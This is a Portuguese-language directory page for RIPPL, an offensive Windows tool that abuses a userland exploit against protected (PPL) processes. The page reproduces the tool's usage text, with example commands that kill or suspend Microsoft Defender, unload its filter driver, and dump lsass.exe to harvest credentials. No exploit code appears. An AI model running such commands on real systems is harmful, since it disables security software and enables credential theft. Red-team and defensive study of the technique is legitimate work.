Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RIPPL — RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows | Kitploit
Ferramentas/GitHubGitHub/last-byte/rippl
Privilege EscalationExploitationPost-ExploitationRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows

Ver Repositório
71há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RIPPL

Manipulando processos protegidos por PPL sem usar um driver

defender engraçado

Esta ferramenta implementa um exploit userland para manipular processos protegidos por PPL do Windows. A técnica foi inicialmente discutida por James Forshaw (também conhecido como @tiraniddo) e Clément Labro (também conhecido como @itm4n) nos seguintes posts de blog.

  • Post de blog de James Forshaw: Windows Exploitation Tricks
  • Post de blog de Clément Labro parte #1: Do You Really Know About LSA Protection (RunAsPPL)?
  • Post de blog de Clément Labro parte #2: Bypassing LSA Protection in Userland

Uso

Aviso: a versão segura do binário NUNCA exibe nada, pois todas as strings e a função de impressão são removidas usando macros de compilação condicional.

Basta executar o executável sem nenhum argumento e você obterá uma ajuda/uso detalhados (válido apenas para binários compilados sem definir a macro OPSEC)

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
Baixar ferramenta